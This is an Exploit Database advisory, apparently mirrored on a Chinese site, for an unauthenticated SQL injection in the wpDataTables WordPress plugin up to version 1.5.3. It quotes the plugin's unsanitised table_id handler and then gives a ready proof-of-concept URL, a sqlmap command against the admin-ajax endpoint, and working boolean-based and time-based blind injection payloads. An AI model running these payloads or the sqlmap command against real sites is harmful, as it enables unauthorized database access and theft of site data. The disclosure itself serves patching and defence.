WordPress Plugin wpDataTables 1.5.3 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Claudio Viviani
  日期： 2014-11-24
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35340/

• ######################
  
  # Exploit Title : WordPress wpDataTables 1.5.3 and below SQL Injection Vulnerability
  
  # Exploit Author : Claudio Viviani 
  
  # Software Link : http://wpdatatables.com (Premium)
  
  # Date : 2014-11-22
  
  # Tested on : Windows 7 / Mozilla Firefox
  Windows 7 / sqlmap (0.8-1)
  Linux / Mozilla Firefox
  Linux / sqlmap 1.0-dev-5b2ded0
  
  ######################
  
  
  # Description
  
  Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
  
  "table_id" variable is not sanitized.
  
  File: wpdatatables.php
  ------------------------
  // AJAX-handlers
  add_action( 'wp_ajax_get_wdtable', 'wdt_get_ajax_data' );
  add_action( 'wp_ajax_nopriv_get_wdtable', 'wdt_get_ajax_data' );
  
  	/**
  	 * Handler which returns the AJAX response
  	 */
  	 function wdt_get_ajax_data(){
  	 	$id = $_GET['table_id']; <------------------- Not Sanitized!
  	 	$table_data = wdt_get_table_by_id( $id );
  	 	$column_data = wdt_get_columns_by_table_id( $id );
  	 	$column_headers = array();
  	 	$column_types = array();
  	 	$column_filtertypes = array();
  	 	$column_inputtypes = array();
  		 foreach($column_data as $column){
  		 		$column_order[(int)$column->pos] = $column->orig_header;
  		 		if($column->display_header){
  			 		$column_headers[$column->orig_header] = $column->display_header;
  		 		}
  		 		if($column->column_type != 'autodetect'){
  			 		$column_types[$column->orig_header] = $column->column_type;
  		 		}else{
  			 		$column_types[$column->orig_header] = 'string';
  		 		}	
  		 		$column_filtertypes[$column->orig_header] = $column->filter_type;
  		 		$column_inputtypes[$column->orig_header] = $column->input_type;
  		 }
  ------------------------
  
  (The vulnerable variable is located in others php files)
  
  
  ######################
  
  # PoC
  
  http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1 [Sqli]
  
  # Sqlmap
  
  sqlmap -u "http://TARGET/wp-admin/admin-ajax.php?action=get_wdtable&table_id=1" -p table_id --dbms mysql
  
  ---
  Parameter: table_id
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: action=get_wdtable&table_id=1 AND 9029=9029
  
  Type: AND/OR time-based blind
  Title: MySQL > 5.0.11 AND time-based blind
  Payload: action=get_wdtable&table_id=1 AND SLEEP(5)
  
  ---
  
  
  #####################
  
  Discovered By : Claudio Viviani
  http://www.homelab.it
  		
  info@homelab.it
  homelabit@protonmail.ch
  
  https://www.facebook.com/homelabit
  https://twitter.com/homelabit
  https://plus.google.com/+HomelabIt1/
  https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  
  #####################